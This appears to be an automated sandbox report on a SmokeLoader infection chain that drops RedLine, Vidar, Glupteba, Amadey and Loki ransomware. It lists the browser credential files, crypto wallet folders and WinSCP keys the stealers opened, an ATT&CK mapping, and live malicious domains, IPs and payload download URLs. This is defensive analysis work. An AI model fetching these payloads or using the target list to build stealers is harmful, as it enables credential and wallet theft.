Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000746C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLR]q
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: build2.exe, 0000002A.00000002.2774828170.0000000003DF0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: build2.exe, 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file__0.localstorage
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000746C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: build2.exe, 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: build2.exe, 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: build2.exe, 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: build2.exe, 0000002A.00000002.2774828170.0000000003DF0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Source: Yara match	File source: 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2965262411.0000000000677000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2966408279.0000000002456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2885619931.000000000746C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 2352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 5428, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 2352, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.file.exe.840e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.F3CC.exe.850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.vusretg.770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vusretg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.F3CC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.F3CC.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vusretg.760e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.2734778264.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123468725.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2370688498.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2802667211.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2056202136.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2316367410.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2370773420.0000000002121000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123563075.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2802808021.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Glupteba

Source: Yara match	File source: 40.3.2899.exe.5a80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.2899.exe.5190e67.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.2899.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2899.exe PID: 4208, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 44.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.build2.exe.3df15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.build2.exe.3df15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.2964943607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2774828170.0000000003DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 5428, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	15 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	2 Data Encrypted for Impact
Default Accounts	1 Scripting	1 Scheduled Task/Job	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Native API	11 Registry Run Keys / Startup Folder	912 Process Injection	1 Scripting	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Shared Modules	1 Services File Permissions Weakness	1 Scheduled Task/Job	3 Obfuscated Files or Information	NTDS	146 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	5 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Exploitation for Client Execution	Network Logon Script	11 Registry Run Keys / Startup Folder	22 Software Packing	LSA Secrets	681 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	126 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	3 Command and Scripting Interpreter	Rc.common	1 Services File Permissions Weakness	1 Timestomp	Cached Domain Credentials	341 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	1 Proxy	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	1 Scheduled Task/Job	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	11 Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	341 Virtualization/Sandbox Evasion	Network Sniffing	2 System Network Configuration Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	912 Process Injection	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	1 Hidden Files and Directories	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	1 Regsvr32	GUI Input Capture	Domain Groups	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement
Trusted Relationship	Python	Hypervisor	Process Injection	1 Services File Permissions Weakness	Web Portal Capture	Cloud Groups	Attack PC via USB Connection	Local Email Collection	Standard Application Layer Protocol	Internal Proxy			Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	39%	ReversingLabs	Win32.Trojan.Smokeloader
file.exe	39%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\2899.exe	100%	Avira	HEUR/AGEN.1303617
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build3[1].exe	100%	Avira	TR/AD.MalwareCrypter.llbpm
C:\Users\user\AppData\Local\Temp\A9E0.dll	100%	Avira	HEUR/AGEN.1300750
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	100%	Avira	HEUR/AGEN.1312455
C:\Users\user\AppData\Local\Temp\A079.exe	100%	Avira	HEUR/AGEN.1303828
C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	100%	Avira	TR/AD.Nekark.gdaph
C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build3.exe	100%	Avira	TR/AD.MalwareCrypter.llbpm
C:\Users\user\AppData\Local\Temp\5DA4.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	100%	Avira	HEUR/AGEN.1312455
C:\Users\user\AppData\Local\Temp\C5F5.exe	100%	Avira	TR/AD.Nekark.gdaph
C:\Users\user\AppData\Local\Temp\2899.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build3[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\B184.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\5DA4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\958B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C5F5.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	82%	ReversingLabs	Win32.Trojan.SmokeLoader
C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build3.exe	87%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	82%	ReversingLabs	Win32.Trojan.SmokeLoader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build3[1].exe	87%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\5DA4.exe	26%	ReversingLabs	ByteCode-MSIL.Trojan.InjectorX
C:\Users\user\AppData\Local\Temp\958B.exe	54%	ReversingLabs	Win32.Ransomware.Loki
C:\Users\user\AppData\Local\Temp\A079.exe	83%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\A9E0.dll	22%	ReversingLabs
C:\Users\user\AppData\Local\Temp\B184.exe	18%	ReversingLabs	Win32.Trojan.Doina
C:\Users\user\AppData\Local\Temp\C5F5.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\IXP000.TMP\treelatest.exe	32%	ReversingLabs	ByteCode-MSIL.Trojan.InjectorX
C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	54%	ReversingLabs	Win32.Ransomware.Loki
C:\Users\user\AppData\Roaming\vusretg	39%	ReversingLabs	Win32.Trojan.Smokeloader

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
colisumy.com	20%	Virustotal	Browse
lightseinsteniki.org	19%	Virustotal	Browse
onualituyrs.org	23%	Virustotal	Browse
zexeq.com	21%	Virustotal	Browse
stualialuyastrelia.net	21%	Virustotal	Browse
alayyadcare.com	13%	Virustotal	Browse
snukerukeutit.org	18%	Virustotal	Browse
hoffmanlevi.space	4%	Virustotal	Browse
liuliuoumumy.org	18%	Virustotal	Browse
loveperry.org	3%	Virustotal	Browse
sumagulituyo.org	18%	Virustotal	Browse
montereyclub.org	4%	Virustotal	Browse
h171008.srv22.test-hf.su	16%	Virustotal	Browse
wirtshauspost.at	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://api.ip.sb/ip	0%	URL Reputation	safe
https://blockchain.infoindex	0%	URL Reputation	safe
https://word.office.comon	0%	URL Reputation	safe
http://zexeq.com/files/1/build3.exe$run	100%	URL Reputation	malware
http://schemas.micro	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23ResponseD	0%	Avira URL Cloud	safe
http://49.12.118.151/lect	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://colisumy.com/dl/build2.exe$run	100%	Avira URL Cloud	malware
http://95.214.27.254/getfile/winlog.exe	100%	Avira URL Cloud	malware
http://95.214.27.254/getfile/winlog.exe	20%	Virustotal		Browse
http://tempuri.org/Entity/Id12Response	2%	Virustotal		Browse
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23ResponseD	1%	Virustotal		Browse
http://colisumy.com/dl/build2.exe$run	18%	Virustotal		Browse
http://tempuri.org/Entity/Id2Response	2%	Virustotal		Browse
http://tonimiuyaytre.org/	100%	Avira URL Cloud	malware
https://we.tl/t-xN3VuzQl0a	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id6ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21Response	4%	Virustotal		Browse
http://tempuri.org/Entity/Id6ResponseD	1%	Virustotal		Browse
http://79.137.192.18/9bDc8sQ/index.php399001	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id13ResponseD	0%	Avira URL Cloud	safe
https://we.tl/t-xN3VuzQl0a	0%	Virustotal		Browse
http://tonimiuyaytre.org/	19%	Virustotal		Browse
http://tempuri.org/Entity/Id15Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id1ResponseD	0%	Avira URL Cloud	safe
http://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onionhttp://eir5kdrltavou3c2wgqszfyt	0%	Avira URL Cloud	safe
http://tyiuiunuewqy.org/	100%	Avira URL Cloud	malware
http://zexeq.com/files/1/build3.exe$run1Y	100%	Avira URL Cloud	malware
https://databaseupgrade.ru	0%	Avira URL Cloud	safe
http://tempuri.org/	1%	Virustotal		Browse
http://tempuri.org/Entity/Id15Response	2%	Virustotal		Browse
http://79.137.192.18/9bDc8sQ/index.phpy	100%	Avira URL Cloud	malware
http://171.22.28.219/treelatestprores.exe	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id1ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
http://https://_bad_pdb_file.pdb	0%	Avira URL Cloud	safe
http://tyiuiunuewqy.org/	19%	Virustotal		Browse
http://tempuri.org/Entity/Id21ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id13ResponseD	1%	Virustotal		Browse
http://79.137.192.18/9bDc8sQ/index.php	100%	Avira URL Cloud	malware
http://79.137.192.18/9bDc8sQ/index.phpa	100%	Avira URL Cloud	malware
http://79.137.192.18/9bDc8sQ/index.phpS	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id24Response	2%	Virustotal		Browse
http://tempuri.org/Entity/Id10ResponseD	0%	Avira URL Cloud	safe
http://79.137.192.18/9bDc8sQ/index.phpW	100%	Avira URL Cloud	malware
http://171.22.28.219/treelatestprores.exe	11%	Virustotal		Browse
http://79.137.192.18/9bDc8sQ/index.php	21%	Virustotal		Browse
http://tempuri.org/Entity/Id21ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id5Response	0%	Avira URL Cloud	safe
http://zexeq.com/raud/get.php?pid=903E7F261711F85395E5CEFBF4173C54	100%	Avira URL Cloud	malware
http://79.137.192.18/9bDc8sQ/index.phpO	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id15ResponseD	0%	Avira URL Cloud	safe
http://49.12.118.151/6R	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id10ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id10Response	0%	Avira URL Cloud	safe
http://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onion	100%	Avira URL Cloud	malware
http://79.137.192.18/9bDc8sQ/index.php398001	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id8Response	0%	Avira URL Cloud	safe
http://liuliuoumumy.org/	100%	Avira URL Cloud	malware
http://wirtshauspost.at/tmp/	0%	Avira URL Cloud	safe
https://hoffmanlevi.space/385119/setup.exe	100%	Avira URL Cloud	malware
http://95.214.27.254/getfile/taskhost.exee	100%	Avira URL Cloud	malware
http://95.214.27.254/getfile/taskhost.exei	100%	Avira URL Cloud	malware
http://tempuri.org/D	0%	Avira URL Cloud	safe
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	0%	Avira URL Cloud	safe
https://databaseupgrade.ruhttps://databaseupgrade.ru	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mikolyda.beget.tech	91.106.207.50	true	false		high
colisumy.com	187.18.108.158	true	true	20%, Virustotal, Browse	unknown
accounts.google.com	142.250.68.13	true	false		high
lightseinsteniki.org	34.143.166.163	true	true	19%, Virustotal, Browse	unknown
t.me	149.154.167.99	true	false		high
stualialuyastrelia.net	91.215.85.17	true	true	21%, Virustotal, Browse	unknown
onualituyrs.org	91.215.85.209	true	true	23%, Virustotal, Browse	unknown
alayyadcare.com	213.6.54.58	true	true	13%, Virustotal, Browse	unknown
zexeq.com	14.33.209.147	true	true	21%, Virustotal, Browse	unknown
iplogger.com	148.251.234.93	true	false		high
snukerukeutit.org	104.198.2.251	true	false	18%, Virustotal, Browse	unknown
loveperry.org	172.67.213.185	true	true	3%, Virustotal, Browse	unknown
h171008.srv22.test-hf.su	91.227.16.22	true	true	16%, Virustotal, Browse	unknown
hoffmanlevi.space	45.130.41.106	true	false	4%, Virustotal, Browse	unknown
sumagulituyo.org	35.205.61.67	true	false	18%, Virustotal, Browse	unknown
liuliuoumumy.org	34.143.166.163	true	true	18%, Virustotal, Browse	unknown
montereyclub.org	172.67.196.133	true	true	4%, Virustotal, Browse	unknown
api.2ip.ua	172.67.139.220	true	false		high
www.google.com	142.250.189.4	true	false		high
clients.l.google.com	142.250.72.238	true	false		high
wirtshauspost.at	211.104.254.139	true	true	1%, Virustotal, Browse	unknown
clients2.google.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://95.214.27.254/getfile/winlog.exe	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://tonimiuyaytre.org/	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://tyiuiunuewqy.org/	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://171.22.28.219/treelatestprores.exe	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://79.137.192.18/9bDc8sQ/index.php	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199560322242	false		high
http://zexeq.com/raud/get.php?pid=903E7F261711F85395E5CEFBF4173C54	true	Avira URL Cloud: malware	unknown
http://liuliuoumumy.org/	true	Avira URL Cloud: malware	unknown
http://wirtshauspost.at/tmp/	true	Avira URL Cloud: safe	unknown
https://hoffmanlevi.space/385119/setup.exe	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id23ResponseD	AppLaunch.exe, 00000011.00000002.2885619931.00000000075CC000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id12Response	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://colisumy.com/dl/build2.exe$run	958B.exe, 00000018.00000002.4500855997.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://49.12.118.151/lect	build2.exe, 0000002C.00000002.2966408279.00000000024E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/i.2ip.ua/geo.json	958B.exe, 00000008.00000003.2574152453.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tempuri.org/	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id2Response	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
